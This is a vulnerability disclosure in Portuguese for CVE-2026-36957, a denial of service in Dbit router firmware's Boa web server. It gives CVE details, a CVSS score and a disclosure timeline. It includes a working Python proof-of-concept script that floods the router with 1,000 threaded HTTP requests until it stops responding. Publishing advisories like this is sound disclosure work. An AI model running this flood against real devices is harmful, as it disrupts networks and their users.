
Prova de conceito para CVE-2026-36957, uma vulnerabilidade de negação de serviço no firmware do roteador Dbit via inundação HTTP no servidor web Boa, causando esgotamento de recursos e travamento do sistema.
ID CVE: CVE-2026-36957 Data: 2026-04-29 Descobridor: Kirubel Solomne Fornecedor: Shenzhen Dibit Network Equipment Co., Ltd. Produto: Roteador Dbit Versão do Firmware: V1.0.0 CWE: CWE-400 - Consumo de Recursos Não Controlado
O firmware V1.0.0 do roteador Dbit é vulnerável a Negação de Serviço por meio do manipulador de URI do servidor web Boa. Ao enviar uma inundação de alto volume de solicitações HTTP GET para URIs inexistentes, um atacante pode esgotar recursos críticos do sistema, incluindo descritores de arquivo e buffers de memória. Isso resulta em um deadlock do kernel ou travamento do sistema que desativa o portal de gerenciamento web e todas as capacidades de roteamento.
Pontuação CVSS v3.1: 7.5 (Alta)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Métrica | Valor |
|---|
| Vetor de Ataque | Rede |
| Complexidade do Ataque | Baixa |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Nenhuma |
| Impacto na Confidencialidade | Nenhum |
| Impacto na Integridade | Nenhum |
| Impacto na Disponibilidade | Alto |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
Comportamento Esperado: O servidor deve limitar conexões e permanecer estável. Comportamento Real: A interface web do roteador fica sem resposta; requer reinicialização manual.
| Data | Evento |
|---|---|
| 2026-04-29 | Vulnerabilidade descoberta |
| 2026-04-29 | Relatada à MITRE |
| 2026-04-29 | CVE-2026-36957 atribuído |
| 2026-04-29 | Divulgação pública |